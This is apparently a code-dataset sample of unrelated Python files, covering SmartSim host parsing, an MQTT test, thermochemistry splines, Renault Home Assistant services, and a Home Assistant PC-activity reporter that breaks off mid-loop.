                    file_name = osp.join(
                        self.path, self.name + "_" + str(shard_id) + file_ending
                    )
                    if osp.exists(file_name):
                        os.remove(file_name)

    def _get_cluster_conf_filename(self, port):
        """Returns the .conf file name for the given port number

        :param port: port number
        :type port: int
        :return: the dbnode configuration file name
        :rtype: str
        """
        return "".join(("nodes-", self.name, "-", str(port), ".conf"))

    def _get_cluster_conf_filenames(self, port):  # cov-lsf
        """Returns the .conf file names for the given port number

        This function should be used if and only if ``_mpmd==True``

        :param port: port number
        :type port: int
        :return: the dbnode configuration file names, one per shard
        :rtype: list[str]
        """
        return [
            "".join(("nodes-", self.name + f"_{shard_id}", "-", str(port), ".conf"))
            for shard_id in self._shard_ids
        ]

    def _parse_db_host(self):
        """Parse the database host/IP from the output file

        :raises SmartSimError: if host/ip could not be found
        :return: ip address | hostname
        :rtype: str
        """
        filepath = osp.join(self.path, self.name + ".out")
        trials = 5
        ip = None

        # try a few times to give the database files time to
        # populate on busy systems.
        while not ip and trials > 0:
            try:
                with open(filepath, "r") as f:
                    lines = f.readlines()
                    for line in lines:
                        content = line.split()
                        if "IPADDRESS:" in content:
                            # The address is the last token on the line.
                            ip = content[-1]
            # suppress error
            except FileNotFoundError:
                pass
            logger.debug("Waiting for Redis output files to populate...")
            if not ip:
                time.sleep(1)
                trials -= 1

        if not ip:
            logger.error("Redis IP address lookup strategy failed.")
            raise SmartSimError("Failed to obtain database hostname")
        return ip

    def _parse_db_hosts(self):
        """Parse the database hosts/IPs from the output files

        this uses the RedisIP module that is built as a dependency
        The IP address is preferred, but if hostname is only present
        then a lookup to /etc/hosts is done through the socket library.
        This function must be called only if ``_mpmd==True``.

        :raises SmartSimError: if host/ip could not be found
        :return: ip addresses | hostnames
        :rtype: list[str]
        """
        ips = []

        # Find out if all shards' output streams are piped to different file
        multiple_files = None
        for _ in range(5):
            filepath = osp.join(self.path, self.name + f"_{self._shard_ids[0]}.out")
            if osp.isfile(filepath):
                multiple_files = True
                break
            # If we did not find separate files for each shard, it could
            # be that all outputs are piped to same file OR that the separate
            # files have not been created yet. To find out whether the
            # streams are piped to the same file, we search the output file
            # for "IPADDRESS": if we find it, we can set multiple_files to False
            # and wait until the file contains enough IPs. Otherwise we
            # go to next iteration, to check if there are multiple files.
            filepath = osp.join(self.path, self.name + ".out")
            ips = []
            try:
                with open(filepath, "r") as f:
                    lines = f.readlines()
                    for line in lines:
                        content = line.split()
                        if "IPADDRESS:" in content:
                            ip = content[-1]
                            ips.append(ip)
            # suppress error
            except FileNotFoundError:
                pass
            logger.debug("Waiting for RedisIP files to populate...")
            if len(ips) < len(self._shard_ids):
                # Larger sleep time, as this seems to be needed for
                # multihost setups
                if len(ips) > 0:
                    # if we found at least one "IPADDRESS", we know
                    # output streams all go to the same file
                    multiple_files = False
                    break
                else:
                    ips = []
                    time.sleep(5)
                    continue
            else:
                # De-duplicate while preserving order.
                ips = list(dict.fromkeys(ips))
                return ips

        if multiple_files is None:
            logger.error("RedisIP address lookup strategy failed.")
            raise SmartSimError("Failed to obtain database hostname")

        # NOTE(review): the two branches below repeat the retry/parse logic
        # above -- candidates for a shared helper in a future refactor.
        if multiple_files == True:
            for shard_id in self._shard_ids:
                trials = 5
                ip = None
                filepath = osp.join(self.path, self.name + f"_{shard_id}.out")
                # try a few times to give the database files time to
                # populate on busy systems.
                while not ip and trials > 0:
                    try:
                        with open(filepath, "r") as f:
                            lines = f.readlines()
                            for line in lines:
                                content = line.split()
                                if "IPADDRESS:" in content:
                                    ip = content[-1]
                                    break
                    # suppress error
                    except FileNotFoundError:
                        pass
                    logger.debug("Waiting for RedisIP files to populate...")
                    if not ip:
                        # Larger sleep time, as this seems to be needed for
                        # multihost setups
                        time.sleep(5)
                        trials -= 1

                if not ip:
                    logger.error("RedisIP address lookup strategy failed.")
                    raise SmartSimError("Failed to obtain database hostname")
                ips.append(ip)
        else:
            # All shards share one output file: keep re-reading it until it
            # contains at least one address per shard.
            filepath = osp.join(self.path, self.name + ".out")
            trials = 5
            ips = []
            while len(ips) < len(self._shard_ids) and trials > 0:
                ips = []
                try:
                    with open(filepath, "r") as f:
                        lines = f.readlines()
                        for line in lines:
                            content = line.split()
                            if "IPADDRESS:" in content:
                                ip = content[-1]
                                ips.append(ip)
                # suppress error
                except FileNotFoundError:
                    pass
                logger.debug("Waiting for RedisIP files to populate...")
                if len(ips) < len(self._shard_ids):
                    # Larger sleep time, as this seems to be needed for
                    # multihost setups
                    time.sleep(5)
                    trials -= 1
            if len(ips) < len(self._shard_ids):
                logger.error("RedisIP address lookup strategy failed.")
                raise SmartSimError("Failed to obtain database hostname")
            ips = list(dict.fromkeys(ips))

        return ips
| 1.492188 | 1 |
tests/test_mqtt/test_retain.py | DerOetzi/HABApp | 44 | 12760258 | <filename>tests/test_mqtt/test_retain.py
from HABApp.core import Items
from HABApp.mqtt.mqtt_connection import process_msg
class MqttDummyMsg:
    """Minimal stand-in for a paho-mqtt message object used by these tests."""

    def __init__(self, topic='', payload='', retain=False):
        # Keep both the decoded topic and its wire (bytes) form, mirroring paho.
        encoded_topic = topic.encode('utf-8')
        self.topic = topic
        self._topic = encoded_topic
        self.payload = payload.encode('utf-8')
        self.retain = retain
        # QoS is irrelevant for these tests; fixed at "at most once".
        self.qos = 0
def test_retain_create():
    """Only retained MQTT messages may implicitly create a new item."""
    topic = '/test/creation'
    assert not Items.item_exists(topic)
    # A non-retained message must NOT create the item.
    process_msg(None, None, MqttDummyMsg(topic, 'aaa', retain=False))
    assert not Items.item_exists(topic)
    # Retain True will create the item
    process_msg(None, None, MqttDummyMsg(topic, 'adsf123', retain=True))
    assert Items.item_exists(topic)
    assert Items.get_item(topic).value == 'adsf123'
    # Clean up so other tests see a pristine item registry.
    Items.pop_item(topic)
| 2.53125 | 3 |
src/floor_estimation_fusion_project/main/flags_global.py | h4vlik/TF2_OD_BRE | 0 | 12760259 | """
Global variables for all scripts and parts of project.
"""
from absl import flags
import os
# Flag names are globally defined! So in general, we need to be
# careful to pick names that are unlikely to be used by other libraries.
# If there is a conflict, we'll get an error at import time.
"""
flags.DEFINE_string('name', '<NAME>', 'Your name.')
flags.DEFINE_integer('age', None, 'Your age in years.', lower_bound=0)
flags.DEFINE_boolean('debug', False, 'Produces debugging output.')
flags.DEFINE_enum('job', 'running', ['running', 'stopped'], 'Job status.')
"""
flags.DEFINE_string('f', '', 'kernel') # workaround due to JupyterNotebook
#####
# define main directory path
#####
flags.DEFINE_string(
'main_dir_path',
os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),
'PATH to main folder path (TF_OD_BRE folder)')
#####
# CAMERA FLAGS START
# common
flags.DEFINE_enum('image_input_mode', 'folder', ['camera', 'video', 'folder'], 'Source of image data.')
# image_feed_camera
flags.DEFINE_integer('camera_device_used', 0, 'An index of the used camera device', lower_bound=0)
# image_feed_camera
flags.DEFINE_string('image_input_folder_path', r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\test\test_images_elevator_control_panel",
'PATH to the folder with images, images passed recursively.')
# image_feed_video
flags.DEFINE_string('image_input_video_path', None, 'PATH to the folder with video, used while image_input_mode=video.')
# INPUT FEED FLAGS END
#####
# ELEVATOR CONTROLS DETECTION FLAGS START
# elevator element detection
flags.DEFINE_string('detector_elements_model_path', r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\test\output\saved_model",
'PATH to a SavedModel file capable of detection of elevator elements.')
flags.DEFINE_enum('detection_elements_model_type', 'tf2',
['tf2', 'reserved'], 'Type of detection model used - RESERVED.')
flags.DEFINE_string('label_map_path_detection',
r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\test\output\pascal_label_map.pbtxt",
'PATH to the label_map.txt | label_map.pbtxt file for detection.')
# floor button classification
flags.DEFINE_string('classification_floor_button_model_path', r"C:\Users\cernil\OneDrive - Y Soft Corporation "
r"a.s\DeepLearningBlackbox\button_classifier",
'PATH to a SavedModel file capable of classification of elevator floor buttons.')
flags.DEFINE_enum('classification_floor_button_model_type', 'keras',
['keras', 'reserved'], 'Type of classification model used - RESERVED.')
# ELEVATOR CONTROLS DETECTION FLAGS END
#####
FLAGS = flags.FLAGS
| 2.109375 | 2 |
cookies/run_test.py | nikicc/anaconda-recipes | 130 | 12760260 | # new cookies.py
from cookies import Cookies, Cookie
cookies = Cookies(rocky='road')
# Can also write explicitly: cookies['rocky'] = Cookie['road']
cookies['rocky'].path = "/cookie"
assert cookies.render_request() == 'rocky=road'
| 2.34375 | 2 |
kallisticore/utils/singleton.py | jpmorganchase/kallisti-core | 1 | 12760261 | import inspect
class Singleton(type):
    """Metaclass caching one instance per class *and* per constructor arguments.

    _instances is organized first by class and then by arguments.
    For a class with:
        class Foo:
            def __init__(self, a, b):
                pass
    _instances can look like:
        {Foo: {frozenset({('a', 1), ('b', 0)}): foo_instance1,
               frozenset({('a', 1), ('b', 2)}): foo_instance2}}

    Note: all argument values must be hashable for the cache key to work.
    """
    _instances = {}

    def __call__(cls, *args, **kwargs):
        insts_by_args = cls._instances.setdefault(cls, {})
        # Normalize positional/keyword arguments (and fill defaults) so that
        # e.g. Foo(1, 2) and Foo(a=1, b=2) resolve to the same cache entry.
        call_args = inspect.getcallargs(cls.__init__, None, *args, **kwargs)
        # Drop only the 'self' placeholder (bound to None above).  The previous
        # `if v` filter also dropped legitimate falsy values (0, '', False),
        # which made e.g. Foo(b=0) and Foo(b='') wrongly share one instance.
        items = tuple((k, v) for k, v in call_args.items() if v is not None)
        key = frozenset(items)
        inst = insts_by_args.get(key)
        # Compare against None explicitly: a cached instance whose __bool__ is
        # falsy must not be silently re-created.
        if inst is None:
            inst = super(Singleton, cls).__call__(*args, **kwargs)
            insts_by_args[key] = inst
        return inst
extended_libs/masternode_count.py | jhodges10/slack-dash-vote-check | 0 | 12760262 | <gh_stars>0
import requests
import json
def get_mn_count():
    """Return the current Dash masternode count.

    Queries the masternode.me network report.  On any failure (network error,
    unexpected payload, non-200 response) falls back to the constant 4700.

    Returns:
        str | int: the count as a comma-stripped string on success, or the
        int 4700 fallback (callers should accept either; kept for
        backward compatibility).
    """
    mn_url = "https://stats.masternode.me/network-report/latest/json"
    try:
        response = requests.request("GET", mn_url)
        # Bug fix: `is not 200` compared object identity, not value.
        if response.status_code != 200:
            mn_count = 4700
        else:
            network_stats = json.loads(response.text)['formatted']
            mn_count = str(network_stats['f_mn_count']).replace(',', '')
    except Exception:
        # Narrowed from a bare `except:` so KeyboardInterrupt/SystemExit are
        # no longer swallowed; any request/parse failure uses the fallback.
        mn_count = 4700
    return mn_count
pgradd/ThermoChem/raw_data.py | VlachosGroup/PythonGroupAdditivity | 2 | 12760263 | <gh_stars>1-10
import numpy as np
from scipy.interpolate import InterpolatedUnivariateSpline
from scipy.integrate import quad as integrate
from .. import yaml_io
from .base import ThermochemBase
from ..Units import eval_qty
# from ..Consts import GAS_CONSTANT as R
import pmutt as pmutt
R = pmutt.constants.R(units='J/mol/K')
# R is now sourced from pmutt.constants instead of Consts
class ThermochemRawData(ThermochemBase):
    """
    Implement a thermochemical property correlation from raw data.
    Evaluated quantities are interpolated using a B-spline as discussed in
    :ref:`correlations documentation <correlations>`.

    Outside the temperature range of the heat-capacity data, Cp/R is held
    constant at the nearest data point and H and S are extrapolated
    analytically from that constant value.
    """
    def __init__(self, ND_H_ref, ND_S_ref, Ts, ND_Cps,
                 T_ref=pmutt.constants.T0(units='K'), range=None):
        """
        Initialize a thermochemical property correlation from raw data.
        Parameters
        ----------
        ND_H_ref : float
            Non-dimensional standard heat of formation |eq_ND_H_ref|
        ND_S_ref : float
            Non-dimensional standard state reference entropy |eq_ND_S_ref|
        Ts : float array
            Temperatures at which `ND_Cps` are evaluated.
        ND_Cps : float
            Non-dimensional standard state heat capacities |eq_ND_Cp_T|
            evaluated at each temperature in `Ts`.
        T_ref : float, optional
            Reference temperature |eq_Tref| for `ND_H_ref` and `ND_S_ref`
            (default: room temperature according to pmutt, likely 298.15K).
        range : tuple(float, float), optional
            ``(lb, ub) = range`` where lb and ub are respectively the lower and
            uppers bounds of temperatures [K] for which the correlation is
            valid. If specified, this range must contain T_ref and all data
            points in ND_Cp.

        Raises
        ------
        ValueError
            If any data point or `T_ref` falls outside the given `range`.
        """
        # Sort the (T, Cp/R) pairs by temperature so the spline input is
        # monotonically increasing.
        (self.Ts, self.ND_Cps) = list(zip(*sorted(
            zip(Ts, ND_Cps), key=lambda T_ND_Cps: T_ND_Cps[0])))
        self.min_T = Ts[0]
        self.max_T = Ts[-1]
        if range is None:
            range = (self.min_T, self.max_T)
        else:
            if self.min_T < range[0] or self.max_T > range[1]:
                raise ValueError(
                    'Heat capacity data points %g or %g lie outside of range'
                    ' [%g,%g].' % (self.min_T, self.max_T, range[0], range[1]))
        if T_ref < range[0] or T_ref > range[1]:
            raise ValueError(
                'T_ref=%g is outside the valid correlation range [%g,%g].'
                % (T_ref, range[0], range[1]))
        ThermochemBase.__init__(self, range)
        # Cp/R values used for constant extrapolation outside the data range.
        self.min_ND_Cp = self.ND_Cps[0]
        self.max_ND_Cp = self.ND_Cps[-1]
        self.ND_H_ref = ND_H_ref
        self.ND_S_ref = ND_S_ref
        self.T_ref = T_ref
        N = len(self.Ts)
        if N == 1:
            # A single data point cannot be splined; use a constant function.
            self.spline = ConstantSpline(self.ND_Cps[0])
        else:
            # Spline degree is cubic when enough points exist, otherwise the
            # highest degree the data supports (N - 1).
            self.spline = InterpolatedUnivariateSpline(
                self.Ts, self.ND_Cps, k=(3 if N > 3 else N - 1))
    def get_CpoR(self, T):
        """Return non-dimensional standard state heat capacity |eq_ND_Cp_T|."""
        self.check_range(T)
        if not np.isscalar(T):
            # Array input: handled vectorized in a helper.
            return self._get_CpoR_ar(T)
        # Constant extrapolation below/above the data range.
        if T < self.min_T:
            return self.min_ND_Cp
        if T > self.max_T:
            return self.max_ND_Cp
        # Work-around for SciPy bug (?):
        # return self.spline(T)
        return float(self.spline(T))
    def _get_CpoR_ar(self, T):
        # Vectorized version of get_CpoR for array-valued T: clamp outside the
        # data range, spline inside it.
        ND_Cp = np.empty(T.shape)
        T_below = T < self.min_T
        T_above = T > self.max_T
        T_middle = np.logical_not(np.logical_or(T_below, T_above))
        ND_Cp[T_below] = self.min_ND_Cp
        ND_Cp[T_above] = self.max_ND_Cp
        ND_Cp[T_middle] = self.spline(T[T_middle])
        return ND_Cp
    def get_SoR(self, T):
        """Return non-dimensional standard state entropy |eq_ND_S_T|.

        Computed as S(T_ref)/R plus the integral of (Cp/R)/T from T_ref to T,
        handled piecewise: constant-Cp segments outside the data range are
        integrated analytically (log terms), the splined interior numerically.
        """
        self.check_range(T)
        T_a = self.T_ref
        T_b = T
        min_T = self.min_T
        max_T = self.max_T
        ND_S = self.ND_S_ref
        # Peel off any portion of [T_a, T_b] below the data range.
        if T_a <= min_T:
            if T_b <= min_T:
                return ND_S + self.min_ND_Cp*np.log(T_b/T_a)
            ND_S += self.min_ND_Cp*np.log(min_T/T_a)
            T_a = min_T
        elif T_b <= min_T:
            ND_S += self.min_ND_Cp*np.log(T_b/min_T)
            T_b = min_T
        # Peel off any portion above the data range.
        if T_a >= max_T:
            if T_b >= max_T:
                return ND_S + self.max_ND_Cp*np.log(T_b/T_a)
            ND_S += self.max_ND_Cp*np.log(max_T/T_a)
            T_a = max_T
        elif T_b >= max_T:
            ND_S += self.max_ND_Cp*np.log(T_b/max_T)
            T_b = max_T
        # The easiest, albeit not necessarily the best thing to do here is to
        # use numerical integration, so that's what we do.
        return ND_S + integrate(lambda t: self.spline(t)/t, T_a, T_b)[0]
    def get_HoRT(self, T):
        """Return non-dimensional standard heat of formation |eq_ND_H_T|.

        Accumulates H/R (temperature units) piecewise, mirroring get_SoR:
        constant-Cp segments analytically, the splined interior via the
        spline's exact integral; divides by T at the end.
        """
        self.check_range(T)
        T_a = self.T_ref
        T_b = T
        min_T = self.min_T
        max_T = self.max_T
        # This value represents the accumulated H/R (has temperature units).
        rH = self.ND_H_ref*T_a
        if T_a <= min_T:
            if T_b <= min_T:
                return (rH + self.min_ND_Cp*(T_b - T_a))/T
            rH += self.min_ND_Cp*(min_T - T_a)
            T_a = min_T
        elif T_b <= min_T:
            rH += self.min_ND_Cp*(T_b - min_T)
            T_b = min_T
        if T_a >= max_T:
            if T_b >= max_T:
                return rH + self.max_ND_Cp*(T_b - T_a)/T
            rH += self.max_ND_Cp*(max_T - T_a)
            T_a = max_T
        elif T_b >= max_T:
            rH += self.max_ND_Cp*(T_b - max_T)
            T_b = max_T
        return (rH + self.spline.integral(T_a, T_b))/T
    @classmethod
    def yaml_construct(cls, params, context):
        # Build an instance from parsed YAML parameters.  Dimensional inputs
        # (H_ref, S_ref, Cp_data) are converted to their non-dimensional
        # counterparts using R and T_ref.
        if 'T_ref' in params:
            T_ref = params['T_ref']
        else:
            #T_ref = eval_qty('298.15 K') #fixed from eval_qty(298.15, 'K')
            T_ref = pmutt.constants.T0(units='K')
            #replaced getting room temp (298K) from eval_qty to pmutt.constants
        if 'ND_H_ref' in params:
            ND_H_ref = params['ND_H_ref']
        else:
            ND_H_ref = params['H_ref']/(R*T_ref)
        if 'ND_S_ref' in params:
            ND_S_ref = params['ND_S_ref']
        else:
            ND_S_ref = params['S_ref']/R
        if 'ND_Cp_data' in params:
            T_data, ND_Cp_data = list(zip(*params['ND_Cp_data']))
            Ts = np.array([T.in_units('K') for T in T_data])
            ND_Cps = np.array(ND_Cp_data)
        else:
            T_data, Cp_data = list(zip(*params['Cp_data']))
            Ts = np.array([T.in_units('K') for T in T_data])
            ND_Cps = np.array(
                [Cp for Cp in Cp_data])/R
        range = params.get('range')
        if range is not None:
            range = range[0].in_units('K'), range[1].in_units('K')
        else:
            # Default the validity range to the span of the data itself.
            range = Ts.min(), Ts.max()
        return cls(ND_H_ref, ND_S_ref, Ts, ND_Cps, T_ref.in_units('K'), range)
    # YAML schema (parsed by yaml_io) describing the accepted input fields for
    # this correlation; dimensional and non-dimensional forms are alternates.
    _yaml_schema = """
range:
  type: tuple
  item_types: [{type: qty, kind: temperature},
               {type: qty, kind: temperature}]
  optional: True
  desc: range of valid temperatures
T_ref:
  type: qty
  kind: temperature
  default: 298.15 K
  desc: reference temperature for reference enthalpy and entropy
ND_Cp_data:
  type: list
  item_type:
    type: tuple
    item_types:
      - type: qty
        kind: temperature
      - type: float
  alts: Cp_data
  desc: set of (T, Cp(T)/R) data point pairs, where R is the gas constant
ND_H_ref:
  type: float
  alts: H_ref
  desc: H_ref/(R*T_ref) where R is the gas constant
ND_S_ref:
  type: float
  alts: ND_S_ref
  desc: S_ref/R where R is the gas constant
Cp_data:
  type: list
  item_type:
    type: tuple
    item_types:
      - type: qty
        kind: temperature
      - type: qty
        kind: molar heat capacity
  alts: ND_Cp_data
  desc: set of (T, Cp(T)) data point pairs
H_ref:
  type: qty
  kind: molar enthalpy
  alts: ND_H_ref
  desc: reference enthalpy
S_ref:
  type: qty
  kind: molar entropy
  alts: ND_S_ref
  desc: reference entropy
"""
# Register this correlation type with the YAML I/O layer so serialized
# 'ThermochemRawData' entries can be parsed back into instances.
yaml_io.register_class('ThermochemRawData',
                       yaml_io.parse(ThermochemRawData._yaml_schema),
                       ThermochemRawData)
class ConstantSpline(object):
    """Drop-in stand-in for ``UnivariateSpline`` when only one data point is
    available: evaluation is constant and the integral is linear in T.
    """
    def __init__(self, ND_Cp):
        # The single (constant) non-dimensional heat-capacity value.
        self.ND_Cp = ND_Cp

    def __call__(self, Ts):
        # Broadcast the constant to the shape of the query temperatures.
        return np.ones_like(Ts) * self.ND_Cp

    def integral(self, T_a, T_b):
        # Exact integral of a constant over [T_a, T_b].
        return (T_b - T_a) * self.ND_Cp
__all__ = ['ThermochemRawData']
| 2.046875 | 2 |
betfair_scraper/__init__.py | meister245/betfair-scraper | 2 | 12760264 | import os
import getpass
from .scraper import BetfairScraper as Betfair
__version__ = '1.0'
SECRETS_DIR = os.path.expanduser('~') + '/.betfair/'
SECRETS_FILE = SECRETS_DIR + 'secrets'
if not os.path.isdir(SECRETS_DIR):
os.mkdir(SECRETS_DIR)
if not os.path.isfile(SECRETS_FILE):
with open(SECRETS_FILE, 'w'):
pass
def get_secrets(name: str) -> tuple:
    """Return ``(username, password)`` for *name* from the secrets file.

    If no stored entry exists, the password is prompted for interactively
    (repeating until non-empty), appended to the secrets file, and the new
    pair is returned.

    Args:
        name: account/user name to look up.

    Returns:
        tuple: ``(username, password)``.
    """
    with open(SECRETS_FILE, 'r') as f:
        # Each non-blank line is "<username> <password>".
        for row in (x for x in f.read().split('\n') if len(x.strip()) > 0):
            username, password = row.split()
            if username == name:
                return username, password
    # Not stored yet: prompt until a non-empty password is entered.
    password = ''
    while not password:
        password = getpass.getpass(f'{name} - password: ')
    with open(SECRETS_FILE, 'a') as f:
        f.write(f'{name} {password}\n')
    # Bug fix: previously returned '' as the username for newly-added entries.
    return name, password
| 2.546875 | 3 |
code/automate.py | jayantsolanki/Proj-4-Introduction-to-Deep-Learning-IntroToML-574 | 0 | 12760265 | <filename>code/automate.py
# automate.py
# Hyper-parameter sweep used for tuning the model: runs main() over a grid of
# dropout rates and (conv1, conv2) filter-size pairs.
import numpy as np
from main import *

FILTER_PAIRS = ((32, 64), (64, 128), (128, 256))

for dropout in np.arange(0.3, 0.6, 0.1):
    print(" For dropout %.2f" % (dropout))
    for width_in, width_out in FILTER_PAIRS:
        print("%d %d" % (width_in, width_out))
        main(dropout, width_in, width_out)
custom_components/renault/services.py | Giancky79/hassRenaultZE | 35 | 12760266 | """Support for Renault services."""
import logging
from typing import Any, Dict
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.typing import HomeAssistantType
from renault_api.kamereon.exceptions import KamereonResponseException
import voluptuous as vol
from .const import DOMAIN, REGEX_VIN
from .renault_hub import RenaultHub
from .renault_vehicle import RenaultVehicleProxy
_LOGGER = logging.getLogger(__name__)
RENAULT_SERVICES = "renault_services"
SCHEMA_CHARGE_MODE = "charge_mode"
SCHEMA_SCHEDULES = "schedules"
SCHEMA_TEMPERATURE = "temperature"
SCHEMA_VIN = "vin"
SCHEMA_WHEN = "when"
SERVICE_AC_CANCEL = "ac_cancel"
SERVICE_AC_CANCEL_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
}
)
SERVICE_AC_START = "ac_start"
SERVICE_AC_START_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
vol.Optional(SCHEMA_WHEN): cv.datetime,
vol.Optional(SCHEMA_TEMPERATURE): cv.positive_int,
}
)
SERVICE_CHARGE_SET_MODE = "charge_set_mode"
SERVICE_CHARGE_SET_MODE_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
vol.Required(SCHEMA_CHARGE_MODE): cv.string,
}
)
SERVICE_CHARGE_SET_SCHEDULES = "charge_set_schedules"
SERVICE_CHARGE_SET_SCHEDULES_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
vol.Required(SCHEMA_SCHEDULES): dict,
}
)
SERVICE_CHARGE_START = "charge_start"
SERVICE_CHARGE_START_SCHEMA = vol.Schema(
{
vol.Required(SCHEMA_VIN): cv.matches_regex(REGEX_VIN),
}
)
async def async_setup_services(hass: HomeAssistantType) -> None:
    """Register the Renault services.

    Idempotent: a flag in ``hass.data`` prevents double registration when
    multiple config entries are set up.
    """
    _LOGGER.debug("Registering renault services")
    if hass.data.get(RENAULT_SERVICES, False):
        return
    hass.data[RENAULT_SERVICES] = True
    async def ac_start(service_call) -> None:
        """Start A/C."""
        service_call_data: Dict[str, Any] = service_call.data
        when = service_call_data.get(SCHEMA_WHEN, None)
        # Default target temperature is 21 degrees C.
        temperature = service_call_data.get(SCHEMA_TEMPERATURE, 21)
        vehicle = get_vehicle(service_call_data)
        _LOGGER.debug("A/C start attempt: %s / %s", when, temperature)
        try:
            result = await vehicle.send_ac_start(temperature=temperature, when=when)
        except KamereonResponseException as err:
            _LOGGER.error("A/C start failed: %s", err)
        else:
            _LOGGER.info("A/C start result: %s", result.raw_data)
    async def ac_cancel(service_call) -> None:
        """Cancel A/C."""
        service_call_data: Dict[str, Any] = service_call.data
        vehicle = get_vehicle(service_call_data)
        _LOGGER.debug("A/C cancel attempt.")
        try:
            result = await vehicle.send_cancel_ac()
        except KamereonResponseException as err:
            _LOGGER.error("A/C cancel failed: %s", err)
        else:
            _LOGGER.info("A/C cancel result: %s", result)
    async def charge_set_mode(service_call) -> None:
        """Set charge mode."""
        service_call_data: Dict[str, Any] = service_call.data
        charge_mode: str = service_call_data[SCHEMA_CHARGE_MODE]
        vehicle = get_vehicle(service_call_data)
        _LOGGER.debug("Charge set mode attempt: %s", charge_mode)
        try:
            # there was some confusion in earlier release regarding upper or lower case of charge-mode
            # so forcing to lower manually for the custom-component (always or always_charging or schedule_mode)
            result = await vehicle.send_set_charge_mode(charge_mode.lower())
        except KamereonResponseException as err:
            _LOGGER.error("Charge set mode failed: %s", err)
        else:
            _LOGGER.info("Charge set mode result: %s", result)
    async def charge_start(service_call) -> None:
        """Start charge."""
        service_call_data: Dict[str, Any] = service_call.data
        vehicle = get_vehicle(service_call_data)
        _LOGGER.debug("Charge start attempt.")
        try:
            result = await vehicle.send_charge_start()
        except KamereonResponseException as err:
            _LOGGER.error("Charge start failed: %s", err)
        else:
            _LOGGER.info("Charge start result: %s", result)
    async def charge_set_schedules(service_call) -> None:
        """Set charge schedules."""
        service_call_data: Dict[str, Any] = service_call.data
        schedules = service_call_data.get(SCHEMA_SCHEDULES)
        vehicle = get_vehicle(service_call_data)
        # Merge the requested changes into the vehicle's current settings so
        # unspecified schedule slots are preserved.
        charge_schedules = await vehicle.get_charging_settings()
        charge_schedules.update(schedules)
        try:
            _LOGGER.debug("Charge set schedules attempt: %s", schedules)
            result = await vehicle.send_set_charge_schedules(charge_schedules)
        except KamereonResponseException as err:
            _LOGGER.error("Charge set schedules failed: %s", err)
        else:
            _LOGGER.info("Charge set schedules result: %s", result)
            _LOGGER.info(
                "It may take some time before these changes are reflected in your vehicle."
            )
    def get_vehicle(service_call_data: Dict[str, Any]) -> RenaultVehicleProxy:
        """Get vehicle from service_call data.

        Searches every configured hub for a vehicle matching the VIN;
        raises ValueError when no match is found.
        """
        vin: str = service_call_data[SCHEMA_VIN]
        proxy: RenaultHub
        for proxy in hass.data[DOMAIN].values():
            # there was some confusion in earlier release regarding upper or lower case of vin
            # so forcing to upper manually for the custom-component
            vehicle = proxy.vehicles.get(vin.upper())
            if vehicle is not None:
                return vehicle
        raise ValueError(f"Unable to find vehicle with VIN: {vin}")
    hass.services.async_register(
        DOMAIN,
        SERVICE_AC_START,
        ac_start,
        schema=SERVICE_AC_START_SCHEMA,
    )
    hass.services.async_register(
        DOMAIN,
        SERVICE_AC_CANCEL,
        ac_cancel,
        schema=SERVICE_AC_CANCEL_SCHEMA,
    )
    hass.services.async_register(
        DOMAIN,
        SERVICE_CHARGE_START,
        charge_start,
        schema=SERVICE_CHARGE_START_SCHEMA,
    )
    hass.services.async_register(
        DOMAIN,
        SERVICE_CHARGE_SET_MODE,
        charge_set_mode,
        schema=SERVICE_CHARGE_SET_MODE_SCHEMA,
    )
    hass.services.async_register(
        DOMAIN,
        SERVICE_CHARGE_SET_SCHEDULES,
        charge_set_schedules,
        schema=SERVICE_CHARGE_SET_SCHEDULES_SCHEMA,
    )
async def async_unload_services(hass: HomeAssistantType) -> None:
    """Unload Renault services."""
    # Nothing to do when the services were never registered.
    if not hass.data.get(RENAULT_SERVICES):
        return
    hass.data[RENAULT_SERVICES] = False
    # De-register every service this integration added (same order as before).
    for service in (
        SERVICE_AC_CANCEL,
        SERVICE_AC_START,
        SERVICE_CHARGE_SET_MODE,
        SERVICE_CHARGE_SET_SCHEDULES,
        SERVICE_CHARGE_START,
    ):
        hass.services.async_remove(DOMAIN, service)
| 2.140625 | 2 |
main.py | TheLastGimbus/hass-pc-usage-detection | 6 | 12760267 | <filename>main.py
"""
Created by @TheLastGimbus
This script reports to Home Assistant when you use/don't use your PC - in a high-level meaning
So not bear nmap or ping - *actually* estimating whether you are *actively* using this PC or not
For now, it detects whether you touch your keyboard or mouse, but in future, it could also detect
if you are watching movie or something
"""
import argparse
from time import sleep
from time import time
import pynput
import requests as re
parser = argparse.ArgumentParser(
description='Script to monitor if you touch your PC and report it to HASS'
)
parser.add_argument(
'-u', '--url', required=True,
help='URL to HASS HTTP binary sensor. '
'Example: http://IP_ADDRESS:8123/api/states/binary_sensor.DEVICE_NAME'
)
parser.add_argument('--keyboard', action='store_true', help='Whether to monitor keyboard')
parser.add_argument('--mouse', action='store_true', help='Whether to monitor mouse')
parser.add_argument(
'-t', '--time', type=int, default=180,
help='How many seconds must pass to report PC as not used - defaults to 3 minutes'
)
parser.add_argument('--token', type=str, required=True, help="HASS long-lived access token")
args = parser.parse_args()
last_interaction = 0
def on_interaction(*shit):
global last_interaction
last_interaction = time()
if args.mouse:
mouse_listener = pynput.mouse.Listener(
on_move=on_interaction,
on_click=on_interaction,
on_scroll=on_interaction,
)
mouse_listener.start()
if args.keyboard:
keyboard_listener = pynput.keyboard.Listener(
on_press=on_interaction,
on_release=on_interaction,
)
keyboard_listener.start()
session = re.session()
session.headers["Authorization"] = f"Bearer {args.token}"
session.headers["Content-Type"] = "application/json"
active = True
last_report = 0
while True:
last_state = active
active = time() - last_interaction < args.time
# If it's different than last state OR last report was 5 minutes ago
# print(active)
if last_state != active or time() - last_report > 300:
if active:
state = 'on'
else:
state = 'off'
